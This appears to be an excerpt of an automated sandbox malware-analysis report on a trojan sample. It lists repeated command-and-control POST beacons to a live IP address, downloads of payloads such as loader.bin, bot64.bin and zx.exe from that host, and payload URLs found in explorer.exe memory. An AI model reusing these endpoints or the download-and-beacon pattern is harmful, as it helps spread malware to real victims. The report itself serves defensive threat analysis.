Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF943240 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,HeapAlloc,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00007FF6CF943240
Source: global traffic HTTP traffic detected: GET /api/loader.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /api/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /x.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: unknown HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: explorer.exe String found in binary or memory: http://176.111.174.140/api/bot.bin
Source: explorer.exe, 00000003.00000002.3315625714.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3307584261.0000000003350000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316703810.0000000009820000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://176.111.174.140/api/bot.binchrome.exehttp://176.111.174.140/api/bot.bintrusteerchrome.exeoper
Source: explorer.exe, explorer.exe, 00000003.00000002.3323802541.000000000C669000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/api/bot64.bin
Source: explorer.exe, 00000003.00000002.3315625714.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3307584261.0000000003350000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316703810.0000000009820000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://176.111.174.140/api/bot64.binhttp://176.111.174.140/api/bot64.binCreateProcessInternalWKernel
Source: explorer.exe, 00000003.00000002.3323802541.000000000C669000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/api/bot64.binom
Source: svchost.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe String found in binary or memory: http://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeM
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2301103912.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2317567736.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2318809241.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr, _lzma.pyd.10.dr, libcrypto-1_1.dll.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000003.00000002.3316980175.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316980175.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2301103912.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2317567736.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2318809241.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr, _lzma.pyd.10.dr, libcrypto-1_1.dll.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2301103912.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2317567736.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2318809241.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.0000024317210000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr, _lzma.pyd.10.dr, libcrypto-1_1.dll.10.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: explorer.exe, 00000003.00000002.3304418358.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2100969793.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2301103912.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2317567736.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2318809241.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr, _lzma.pyd.10.dr, libcrypto-1_1.dll.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
